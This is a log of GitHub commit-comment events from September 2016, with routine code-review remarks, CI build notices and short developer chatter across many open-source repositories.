{"id":"4563157975","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19022264,"position":null,"line":null,"path":null,"commit_id":"2de0712306d4539a89beb4cd1fefc099f08a5a3f","created_at":"2016-09-14T16:43:17Z","updated_at":"2016-09-14T16:43:17Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 23](http://munit-050:8112/tc/viewLog.html?buildId=99026&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-14T16:43:17Z"}
{"id":"4563158290","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19022266,"position":null,"line":null,"path":null,"commit_id":"99bbeaca0df1fc6926d3b9ffc60a372e37a20f27","created_at":"2016-09-14T16:43:19Z","updated_at":"2016-09-14T16:43:19Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 24](http://munit-050:8112/tc/viewLog.html?buildId=99027&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-14T16:43:19Z"}
{"id":"4563166465","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19022287,"position":null,"line":null,"path":null,"commit_id":"d6066525fc4e96cd6ce180922f2e47c5363f039e","created_at":"2016-09-14T16:44:47Z","updated_at":"2016-09-14T16:44:47Z","body":"okay so i decided to rework on all including packer if i take from u u can see cherry-pick but sorry only cherry-pick if i add u as \"script made my eoghan\"everything will look like yours when i finished my job u will see commit by my mentioning"}},"created_at":"2016-09-14T16:44:47Z"}
{"id":"4563166514","type":"CommitCommentEvent","actor":{"login":"felixmulder"},"repo":{"name":"felixmulder/dotty"},"payload":{"comment":{"id":19022288,"position":null,"line":null,"path":null,"commit_id":"ccc4b1921ad1e3145258f3b3aa2ca2ac3262aabe","created_at":"2016-09-14T16:44:48Z","updated_at":"2016-09-14T16:44:48Z","body":"Cool, then I'll make a small demo and show it during the dotty meeting and we can discuss it further. Thanks for the links! "}},"created_at":"2016-09-14T16:44:48Z"}
{"id":"4563168085","type":"CommitCommentEvent","actor":{"login":"p0xD"},"repo":{"name":"Hacknology/dovakhiin"},"payload":{"comment":{"id":19022293,"position":74,"line":74,"path":"dovakhiin.py","commit_id":"fe33bed46bc8dc0f2daf612ba4da2d08548c615a","created_at":"2016-09-14T16:45:04Z","updated_at":"2016-09-14T16:45:04Z","body":"It's trash."}},"created_at":"2016-09-14T16:45:04Z"}
{"id":"4563172809","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022303,"position":null,"line":null,"path":null,"commit_id":"9726052da9fd662181348df5e3c6be5c397641c5","created_at":"2016-09-14T16:45:53Z","updated_at":"2016-09-14T16:45:53Z","body":"Super, but lets stick to consistent naming so let's use the first two letters to denote the country (using the two letter ISO codes) and then the acronym.\r\n\r\nex. gb_fscs, cz_dif"}},"created_at":"2016-09-14T16:45:53Z"}
{"id":"4563175897","type":"CommitCommentEvent","actor":{"login":"bgeuken"},"repo":{"name":"openSUSE/open-build-service"},"payload":{"comment":{"id":19022307,"position":null,"line":null,"path":null,"commit_id":"c6f261307af0a51f1e8df894e13b4c923f3f325a","created_at":"2016-09-14T16:46:26Z","updated_at":"2016-09-14T16:46:26Z","body":"@hennevogel JFYI"}},"created_at":"2016-09-14T16:46:26Z"}
{"id":"4563179503","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"pytest-dev/pytest"},"payload":{"comment":{"id":19022316,"position":null,"line":null,"path":null,"commit_id":"4eeb4751385519d54b304176f4712ec4ae01865b","created_at":"2016-09-14T16:47:03Z","updated_at":"2016-09-14T16:47:03Z","body":"just adding the backreference - #1932"}},"created_at":"2016-09-14T16:47:03Z"}
{"id":"4563180585","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022320,"position":null,"line":null,"path":null,"commit_id":"cc81379adedb06e9424eb8fbfdd264e8de4ab2e1","created_at":"2016-09-14T16:47:15Z","updated_at":"2016-09-14T16:47:15Z","body":"lets omit these until they become used. Also we should stick to the bloomberg ticker naming convention so we can plug into bloomberg when the time comes"}},"created_at":"2016-09-14T16:47:15Z"}
{"id":"4563183716","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19022327,"position":null,"line":null,"path":null,"commit_id":"7ab0afb3a8bf8bc2f93d2b4f9abf4c2d32b04228","created_at":"2016-09-14T16:47:49Z","updated_at":"2016-09-14T16:47:49Z","body":"Looks good. Should it maybe do some hash validation and confirm that it's a sha1sum to prevent weird issues to happen?"}},"created_at":"2016-09-14T16:47:49Z"}
{"id":"4563185593","type":"CommitCommentEvent","actor":{"login":"bhj"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19022342,"position":null,"line":null,"path":null,"commit_id":"f00ebd3775ec5b9cbbfd9777f37700433ddb1631","created_at":"2016-09-14T16:48:12Z","updated_at":"2016-09-14T16:48:12Z","body":"@davezuko Curious, did you guys run into issues with Koa2+Babel in production? All the recent simplification looks great btw."}},"created_at":"2016-09-14T16:48:12Z"}
{"id":"4563186456","type":"CommitCommentEvent","actor":{"login":"axl89"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19022345,"position":44,"line":241,"path":"tests/console/Bulk_operations.py","commit_id":"7b59f09eafd12c4833c83a136bb018f85697e58c","created_at":"2016-09-14T16:48:20Z","updated_at":"2016-09-14T16:48:20Z","body":"You should also check out if the `new_min` and `new_max` values are applied. You must create new asserts to go to the real modules of `agent_name_1` and `agent_name_2` and check if these values have been applied to the modules.\r\n\r\nRight now you are only asserting if the \"Are you sure\" pop-up has been launched! ;)"}},"created_at":"2016-09-14T16:48:20Z"}
{"id":"4563188581","type":"CommitCommentEvent","actor":{"login":"Jermolene"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":19022355,"position":6,"line":15,"path":"core/palettes/Blanca.tid","commit_id":"16301532bfed17564e175b066ba4f8da1ee70ffe","created_at":"2016-09-14T16:48:43Z","updated_at":"2016-09-14T16:48:43Z","body":"Interesting idea, worth investigating.\r\n\r\nI *hate* Firefox's promiscuous CSS warnings..."}},"created_at":"2016-09-14T16:48:43Z"}
{"id":"4563197692","type":"CommitCommentEvent","actor":{"login":"arthurnn"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19022374,"position":null,"line":null,"path":null,"commit_id":"111227c0dfb72b060428063e35d865b62338654a","created_at":"2016-09-14T16:50:25Z","updated_at":"2016-09-14T16:50:25Z","body":"s/Rubocup/Rubocop"}},"created_at":"2016-09-14T16:50:25Z"}
{"id":"4563199229","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"rasantana/EDL"},"payload":{"comment":{"id":19022375,"position":null,"line":null,"path":null,"commit_id":"6c04a8831da3d085436330992642ea4b0bad010f","created_at":"2016-09-14T16:50:42Z","updated_at":"2016-09-14T16:50:42Z","body":"Favor colocar em um diretório apropriado."}},"created_at":"2016-09-14T16:50:42Z"}
{"id":"4563200127","type":"CommitCommentEvent","actor":{"login":"doubghlas"},"repo":{"name":"Pronatec-Unit/cloud-tech"},"payload":{"comment":{"id":19022380,"position":null,"line":null,"path":null,"commit_id":"430bd4a7987f8a2f885a15bdecd6deb5a27e0844","created_at":"2016-09-14T16:50:52Z","updated_at":"2016-09-14T16:50:52Z","body":"![arquivos](https://cloud.githubusercontent.com/assets/21087057/18521374/3a489ae4-7a82-11e6-8be4-b2fcb56801f6.png)\r\n![avisos](https://cloud.githubusercontent.com/assets/21087057/18521379/3a4ca5a8-7a82-11e6-9e86-e2ed12bf008c.png)\r\n![home](https://cloud.githubusercontent.com/assets/21087057/18521375/3a493af8-7a82-11e6-932c-353e98b5d458.png)\r\n![login](https://cloud.githubusercontent.com/assets/21087057/18521376/3a494142-7a82-11e6-859c-5e946e32dde9.png)\r\n![login-page](https://cloud.githubusercontent.com/assets/21087057/18521378/3a4af514-7a82-11e6-8539-82f8e5766ecf.png)\r\n![menu](https://cloud.githubusercontent.com/assets/21087057/18521377/3a4a01f4-7a82-11e6-981e-69e4c489613e.png)\r\n![trabalho](https://cloud.githubusercontent.com/assets/21087057/18521380/3a5c7726-7a82-11e6-9370-63998cbdb49a.png)\r\n\r\n"}},"created_at":"2016-09-14T16:50:52Z"}
{"id":"4563200140","type":"CommitCommentEvent","actor":{"login":"ryneeverett"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":19022379,"position":null,"line":null,"path":null,"commit_id":"0bf71df211f70da08a6988808795f163ae01f248","created_at":"2016-09-14T16:50:52Z","updated_at":"2016-09-14T16:50:52Z","body":"Right, but how do you override a template of lower precedence of the same name if the syntax that used to do this has the overextends behaviour? A concrete example of the old syntax:\r\n\r\n*A.html*\r\n\r\n```html\r\n{ extends \"base.html\" }\r\n```\r\n\r\n*B.html*\r\n\r\n```html\r\n{ extends \"A.html\" }\r\n```\r\n\r\n*C.html*\r\n\r\n```html\r\n{ overextends \"A.html\" }\r\n```\r\n\r\nIf django's `extends` behavior now has the behavior of `C`, how does one get the behavior of `B`?\r\n"}},"created_at":"2016-09-14T16:50:52Z"}
{"id":"4563203984","type":"CommitCommentEvent","actor":{"login":"awoods"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":19022389,"position":15,"line":32,"path":"pom.xml","commit_id":"f6380c8542108d3ad39baa94588df016b3b2dda4","created_at":"2016-09-14T16:51:33Z","updated_at":"2016-09-14T16:51:33Z","body":"SNAPSHOT dependency... scary. \r\nIs this the same plugin project? https://github.com/maven-download-plugin/maven-download-plugin/releases\r\nThey seem to be on release: 1.3.0"}},"created_at":"2016-09-14T16:51:33Z"}
{"id":"4563208956","type":"CommitCommentEvent","actor":{"login":"Bonobeau"},"repo":{"name":"Bonobeau/android_device_huawei_y6"},"payload":{"comment":{"id":19022409,"position":53,"line":53,"path":"BoardConfig.mk","commit_id":"1c1504304f24a13e1ea73d48e98b8bd84fea6b5f","created_at":"2016-09-14T16:52:28Z","updated_at":"2016-09-14T16:52:28Z","body":"?"}},"created_at":"2016-09-14T16:52:28Z"}
{"id":"4563209562","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19022411,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-14T16:52:35Z","updated_at":"2016-09-14T16:52:35Z","body":"вместе с этим пришолось еще 10 коммитов отменить чтоб заработало, разницы пока нет"}},"created_at":"2016-09-14T16:52:35Z"}
{"id":"4563210576","type":"CommitCommentEvent","actor":{"login":"a0c"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19022414,"position":null,"line":null,"path":null,"commit_id":"3e4206b4d45061d051ac778bc680c82ea6a9149a","created_at":"2016-09-14T16:52:45Z","updated_at":"2016-09-14T16:52:45Z","body":"@dbo-odoo \r\nAre you really sure this change alone is enough to fix the situation where a customer receives no good feedback about his order being confirmed?\r\n\r\nAFAIK, even with GET method added, DPN url will bring you to the `paypal_validate_data()` method, where you have a 50/50 chance (in my live tests) to end up in the `resp == 'INVALID'` branch. This will redirect the customer right to `/shop` url (e.g. if he started with the shopping cart of the `website_sale` module). But /shop _is not a nice way to welcome back your customer right after they pay you_.\r\n\r\nBTW, what does DPN stand for?"}},"created_at":"2016-09-14T16:52:45Z"}
{"id":"4563212765","type":"CommitCommentEvent","actor":{"login":"tristanhimmelman"},"repo":{"name":"Hearst-DD/ObjectMapper"},"payload":{"comment":{"id":19022425,"position":null,"line":null,"path":null,"commit_id":"ddf2c721a9f6b63d4bfa97c1065c31d5fa8548d5","created_at":"2016-09-14T16:53:10Z","updated_at":"2016-09-14T16:53:10Z","body":"As far as I know, this is not a podfile option. See CocoaPods/CocoaPods#5841"}},"created_at":"2016-09-14T16:53:10Z"}
{"id":"4563213881","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19022428,"position":null,"line":null,"path":null,"commit_id":"99bbeaca0df1fc6926d3b9ffc60a372e37a20f27","created_at":"2016-09-14T16:53:21Z","updated_at":"2016-09-14T16:53:21Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 24](http://munit-050:8112/tc/viewLog.html?buildId=99027&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-14T16:53:21Z"}
{"id":"4563221269","type":"CommitCommentEvent","actor":{"login":"phistuck"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19022447,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T16:54:42Z","updated_at":"2016-09-14T16:54:42Z","body":"I know. For the sake of consistency, this should really not be here."}},"created_at":"2016-09-14T16:54:42Z"}
{"id":"4563221714","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"jeffersonccomp/EDL"},"payload":{"comment":{"id":19022448,"position":null,"line":null,"path":null,"commit_id":"5b1bb4d027f11f899b4b44146a14d0ba20d2161d","created_at":"2016-09-14T16:54:47Z","updated_at":"2016-09-14T16:54:47Z","body":"Era pra ser o screenshot do Love."}},"created_at":"2016-09-14T16:54:47Z"}
{"id":"4563223552","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19022453,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-14T16:55:08Z","updated_at":"2016-09-14T16:55:08Z","body":"@lordloki : What's your opinion ?"}},"created_at":"2016-09-14T16:55:08Z"}
{"id":"4563223884","type":"CommitCommentEvent","actor":{"login":"imjorge"},"repo":{"name":"Netflix/lemur"},"payload":{"comment":{"id":19022454,"position":6,"line":19,"path":".travis.yml","commit_id":"d850d677da4954f0e1f2d6340fc92e4cee9e36be","created_at":"2016-09-14T16:55:11Z","updated_at":"2016-09-14T16:55:11Z","body":"this has a SQL syntax error on the quotes around `lemur`, right? Should read:\r\n\r\n```\r\n- psql -c \"create user lemur with password 'lemur';\" -U postgres\r\n```"}},"created_at":"2016-09-14T16:55:11Z"}
{"id":"4563228279","type":"CommitCommentEvent","actor":{"login":"awoods"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":19022471,"position":43,"line":210,"path":"pom.xml","commit_id":"f6380c8542108d3ad39baa94588df016b3b2dda4","created_at":"2016-09-14T16:55:54Z","updated_at":"2016-09-14T16:55:54Z","body":"This works:\r\n```\r\n      <plugin>\r\n        <groupId>com.googlecode.maven-download-plugin</groupId>\r\n        <artifactId>download-maven-plugin</artifactId>\r\n        <version>${maven-download-plugin.version}</version>\r\n```\r\nWhere `${maven-download-plugin.version}` = 1.3.0"}},"created_at":"2016-09-14T16:55:54Z"}
{"id":"4563234182","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19022497,"position":16,"line":69,"path":"src/game/AI/PetAI.cpp","commit_id":"b293444ac856e82d669b2dfeababacb9503e1101","created_at":"2016-09-14T16:56:58Z","updated_at":"2016-09-14T16:56:58Z","body":"As you can see, this is where mini pets used to be handled, but since there is no way they could be using PetAI currently they must be roaming wild in GuardianAI."}},"created_at":"2016-09-14T16:56:58Z"}
{"id":"4563236285","type":"CommitCommentEvent","actor":{"login":"jrtom"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19022511,"position":null,"line":null,"path":null,"commit_id":"112e7eb1358ab4bcbaea7a61e195fba29b7e0d13","created_at":"2016-09-14T16:57:20Z","updated_at":"2016-09-14T16:57:20Z","body":"Given the connected component, the complete graph is implicit: to ask whether two nodes are adjacent, internally that turns into a question of whether they're in the same component; similarly, to list all the nodes adjacent to a given node, you just return all the nodes in the same component.  So you never actually construct the complete graph, which is how you save the time.\r\n\r\nTo calculate the connected components in that time, you use union-find with path compression and union by rank; the actual time is slightly more than O(m) but it's close enough to that that you may as well call it that.\r\n\r\n"}},"created_at":"2016-09-14T16:57:20Z"}
{"id":"4563240146","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022524,"position":null,"line":null,"path":null,"commit_id":"e73fdad4520fdad35030e0bb754de60f910a1a10","created_at":"2016-09-14T16:58:01Z","updated_at":"2016-09-14T16:58:01Z","body":"nb. it's a list ;)"}},"created_at":"2016-09-14T16:58:01Z"}
{"id":"4563249530","type":"CommitCommentEvent","actor":{"login":"davezuko"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19022558,"position":null,"line":null,"path":null,"commit_id":"f00ebd3775ec5b9cbbfd9777f37700433ddb1631","created_at":"2016-09-14T16:59:42Z","updated_at":"2016-09-14T16:59:42Z","body":"@bhj no issues with Koa, and it's by far the saddest loss with the simplifications. The backend team at TA still uses Express but started ripping babel out and it's convinced me to do the same for personal projects, which means dropping Koa just because I'm not much of a fan of the generator async hackery despite its brilliance. Ultimately, the server in this project is just there for webpack in development and a rudimentary backend API. Anything bigger than that it's totally feasible to use whatever you want.\r\n\r\nBabel did cause various headaches, if not outright issues, and at a minimum just made our lives more difficult (accurate code coverage reports, breaking changes/dependencies, inability to just start coding without any setup). It's a great idea, but I find that I'm distancing myself from complex build systems with each passing day.\r\n\r\nAnd thanks, I appreciate it. I started more seriously questioning _why_ all this stuff was in the project other than that it's part of the ecosystem and was requested at one point in time, so hopefully we can make things a little more manageable."}},"created_at":"2016-09-14T16:59:42Z"}
{"id":"4563249626","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19022559,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T16:59:43Z","updated_at":"2016-09-14T16:59:43Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T16:59:43Z"}
{"id":"4563251821","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022574,"position":null,"line":null,"path":null,"commit_id":"cf5b92f9b2ee0563713901189b4456f50816a360","created_at":"2016-09-14T17:00:09Z","updated_at":"2016-09-14T17:00:09Z","body":"lets skip this commit for the time being"}},"created_at":"2016-09-14T17:00:09Z"}
{"id":"4563257006","type":"CommitCommentEvent","actor":{"login":"aprilwhittle"},"repo":{"name":"aprilwhittle/ccc-libki"},"payload":{"comment":{"id":19022585,"position":null,"line":null,"path":null,"commit_id":"a547ebcd6bd0168d736da1ecd99638da9383169b","created_at":"2016-09-14T17:01:02Z","updated_at":"2016-09-14T17:01:02Z","body":"1. Add this file to ~/perl5/lib/perl5/Alma/UserREST.pm\r\n2. sudo apt-get install libxml-simple-perl"}},"created_at":"2016-09-14T17:01:02Z"}
{"id":"4563257675","type":"CommitCommentEvent","actor":{"login":"bmcutler"},"repo":{"name":"Submitty/Submitty"},"payload":{"comment":{"id":19022588,"position":26,"line":217,"path":"TAGradingServer/account/ajax/admin-hw-report.php","commit_id":"403227cbd269ff65462bb078b10bb736548f50e2","created_at":"2016-09-14T17:01:10Z","updated_at":"2016-09-14T17:01:10Z","body":"This doesn't actually affect anything, does it???"}},"created_at":"2016-09-14T17:01:10Z"}
{"id":"4563262429","type":"CommitCommentEvent","actor":{"login":"arecarn"},"repo":{"name":"important-business/engine"},"payload":{"comment":{"id":19022601,"position":5,"line":30,"path":"src/systems/render.cpp","commit_id":"239af4cb38e48dc0fb58e0be169e0a2696e81af9","created_at":"2016-09-14T17:01:58Z","updated_at":"2016-09-14T17:01:58Z","body":":+1: "}},"created_at":"2016-09-14T17:01:58Z"}
{"id":"4563263220","type":"CommitCommentEvent","actor":{"login":"baronvonvaderham"},"repo":{"name":"AASHE/hub"},"payload":{"comment":{"id":19022604,"position":null,"line":null,"path":null,"commit_id":"dd46724427bcc215c01ac573ab421b7876bbf96a","created_at":"2016-09-14T17:02:07Z","updated_at":"2016-09-14T17:02:07Z","body":"No longer necessary as @jamstooks added a much more thorough version on his branch, but served its purpose in unlocking my dev instance for the time being."}},"created_at":"2016-09-14T17:02:07Z"}
{"id":"4563263344","type":"CommitCommentEvent","actor":{"login":"DonQuixote007"},"repo":{"name":"DonQuixote007/Pancho-s-Sports-Streams"},"payload":{"comment":{"id":19022605,"position":1,"line":1,"path":"README.md","commit_id":"691b66571f287e845e0c10bd56885d09e11f47f0","created_at":"2016-09-14T17:02:09Z","updated_at":"2016-09-14T17:02:09Z","body":"#EXTM3U\r\n\r\n"}},"created_at":"2016-09-14T17:02:09Z"}
{"id":"4563266805","type":"CommitCommentEvent","actor":{"login":"sgtmt"},"repo":{"name":"sgtmt/view_Animation"},"payload":{"comment":{"id":19022615,"position":41,"line":53,"path":"viewAnimation/NextViewController.swift","commit_id":"c810c14db881b99876af45c571661a5a0304433c","created_at":"2016-09-14T17:02:46Z","updated_at":"2016-09-14T17:02:46Z","body":"なにこれ"}},"created_at":"2016-09-14T17:02:46Z"}
{"id":"4563268582","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-surface-reflectance"},"payload":{"comment":{"id":19022619,"position":null,"line":null,"path":null,"commit_id":"a3d2444c13e25caf37082d0570096ae8c0940df8","created_at":"2016-09-14T17:03:06Z","updated_at":"2016-09-14T17:03:06Z","body":"The changes seem fine"}},"created_at":"2016-09-14T17:03:06Z"}
{"id":"4563269611","type":"CommitCommentEvent","actor":{"login":"sgtmt"},"repo":{"name":"sgtmt/view_Animation"},"payload":{"comment":{"id":19022620,"position":41,"line":53,"path":"viewAnimation/NextViewController.swift","commit_id":"c810c14db881b99876af45c571661a5a0304433c","created_at":"2016-09-14T17:03:17Z","updated_at":"2016-09-14T17:03:17Z","body":"あれだよあれSwiftが3.0になって書き方変わった"}},"created_at":"2016-09-14T17:03:17Z"}
{"id":"4563270713","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022625,"position":null,"line":null,"path":null,"commit_id":"b811d8b5f03db76dadd76b5e6a0dff7477c4bc97","created_at":"2016-09-14T17:03:29Z","updated_at":"2016-09-14T17:03:29Z","body":"Issuers and guarantors also inherit from entity, not just customers."}},"created_at":"2016-09-14T17:03:29Z"}
{"id":"4563271954","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19022629,"position":null,"line":null,"path":null,"commit_id":"ba9a06d1d23905e3c92cd9aeb98c56290c321f0d","created_at":"2016-09-14T17:03:43Z","updated_at":"2016-09-14T17:03:43Z","body":"lgetm, added to you checklist.  boring."}},"created_at":"2016-09-14T17:03:43Z"}
{"id":"4563273189","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19022631,"position":null,"line":null,"path":null,"commit_id":"9ad604811cd34b5e349c4333b62448eaf6849c8a","created_at":"2016-09-14T17:03:57Z","updated_at":"2016-09-14T17:03:57Z","body":"Asked around on this before doing this... Consensus is: \" works for forge only,  remove that garbage... \" just to quote some replies.  So done."}},"created_at":"2016-09-14T17:03:57Z"}
{"id":"4563275139","type":"CommitCommentEvent","actor":{"login":"ThinkRedstone"},"repo":{"name":"Spikes-2212-Programming-Guild/SLSubsystemSuit"},"payload":{"comment":{"id":19022633,"position":null,"line":null,"path":null,"commit_id":"639e6ad1c2831139b86b3cb8d52ba625dc50a03f","created_at":"2016-09-14T17:04:19Z","updated_at":"2016-09-14T17:04:19Z","body":"Shaked, don't mess with me. I know where you live. I know who you are. While you slept, I Studied the Blade. While you wrote bad code, I Studied the Blade. And now, when you come weeping, I shall show you my True Potentional."}},"created_at":"2016-09-14T17:04:19Z"}
{"id":"4563275839","type":"CommitCommentEvent","actor":{"login":"st186"},"repo":{"name":"st186/CollegeAdmission"},"payload":{"comment":{"id":19022635,"position":null,"line":null,"path":null,"commit_id":"f2cdd2264b222d5d068525ba08ca15a5b8ff9ae8","created_at":"2016-09-14T17:04:27Z","updated_at":"2016-09-14T17:04:27Z","body":"This is a project on online College Admissions in which people can appear for counselling by filling forms and then accordngly will be getting colleges"}},"created_at":"2016-09-14T17:04:27Z"}
{"id":"4563278118","type":"CommitCommentEvent","actor":{"login":"st186"},"repo":{"name":"st186/CollegeAdmission"},"payload":{"comment":{"id":19022639,"position":1,"line":1,"path":"README.md","commit_id":"f2cdd2264b222d5d068525ba08ca15a5b8ff9ae8","created_at":"2016-09-14T17:04:47Z","updated_at":"2016-09-14T17:04:47Z","body":"This is a project on online College Admissions in which people can appear for counselling by filling forms and then accordngly will be getting colleges"}},"created_at":"2016-09-14T17:04:47Z"}
{"id":"4563278873","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19022640,"position":null,"line":null,"path":null,"commit_id":"4f74e5706b17392c214e1450b12becc7dc011a0a","created_at":"2016-09-14T17:04:55Z","updated_at":"2016-09-14T17:04:55Z","body":"I still think this is logically incorrect. Isn't constraint matching only on instances anyways?"}},"created_at":"2016-09-14T17:04:55Z"}
{"id":"4563279208","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022641,"position":null,"line":null,"path":null,"commit_id":"9831db72e4dccecb6407692b2940dd1ffaabda0b","created_at":"2016-09-14T17:04:59Z","updated_at":"2016-09-14T17:04:59Z","body":"No need to add these as they are inherited from the entity schema:\r\n[https://raw.githubusercontent.com/SuadeLabs/fire/master/v1-dev/entity.json](https://raw.githubusercontent.com/SuadeLabs/fire/master/v1-dev/entity.json)"}},"created_at":"2016-09-14T17:04:59Z"}
{"id":"4563280008","type":"CommitCommentEvent","actor":{"login":"1st1"},"repo":{"name":"MagicStack/asyncpg"},"payload":{"comment":{"id":19022642,"position":null,"line":null,"path":null,"commit_id":"cd0003a35089d8747c77080e1a903bfc07609a97","created_at":"2016-09-14T17:05:09Z","updated_at":"2016-09-14T17:05:09Z","body":"You got it! ;)"}},"created_at":"2016-09-14T17:05:09Z"}
{"id":"4563284326","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022648,"position":null,"line":null,"path":null,"commit_id":"f58ed815da9e5dbcb9734f1b18c01b2265fc8c3e","created_at":"2016-09-14T17:05:47Z","updated_at":"2016-09-14T17:05:47Z","body":"Skip (see guarantor schema comments)"}},"created_at":"2016-09-14T17:05:47Z"}
{"id":"4563286425","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19022655,"position":null,"line":null,"path":null,"commit_id":"e2a14ab2b8bef14b3b44a99fe9980282df0d97aa","created_at":"2016-09-14T17:06:10Z","updated_at":"2016-09-14T17:06:10Z","body":"Javadocs are not complete.... Still need alot of descriptions added in but that is below minor level and will be addressed later.  IDE's dont typically complain about that only if the @param , etc are completely missing, only time you'll even be warned about it is when running mvn javadoc:javadoc"}},"created_at":"2016-09-14T17:06:10Z"}
{"id":"4563287451","type":"CommitCommentEvent","actor":{"login":"Yrm86"},"repo":{"name":"Yrm86/Prueba"},"payload":{"comment":{"id":19022659,"position":null,"line":null,"path":null,"commit_id":"3e64b7cf641cc3233a9f00bc856113c7ef0c6fa2","created_at":"2016-09-14T17:06:22Z","updated_at":"2016-09-14T17:06:22Z","body":"Ahora vuelvo editar para ver cómo puedo añadir comentarios en caso de realizar algún cambio en mi proyecto"}},"created_at":"2016-09-14T17:06:22Z"}
{"id":"4563287844","type":"CommitCommentEvent","actor":{"login":"yvele"},"repo":{"name":"Azure/azure-webjobs-sdk-script"},"payload":{"comment":{"id":19022661,"position":null,"line":null,"path":null,"commit_id":"fabcfc371add772f6791b30673e30f8578f7b287","created_at":"2016-09-14T17:06:26Z","updated_at":"2016-09-14T17:06:26Z","body":"👍 "}},"created_at":"2016-09-14T17:06:26Z"}
{"id":"4563290912","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022669,"position":null,"line":null,"path":null,"commit_id":"e2d41f364270c9feceb1bbe202ed82a95000c06d","created_at":"2016-09-14T17:07:02Z","updated_at":"2016-09-14T17:07:02Z","body":"See comments in account schema"}},"created_at":"2016-09-14T17:07:02Z"}
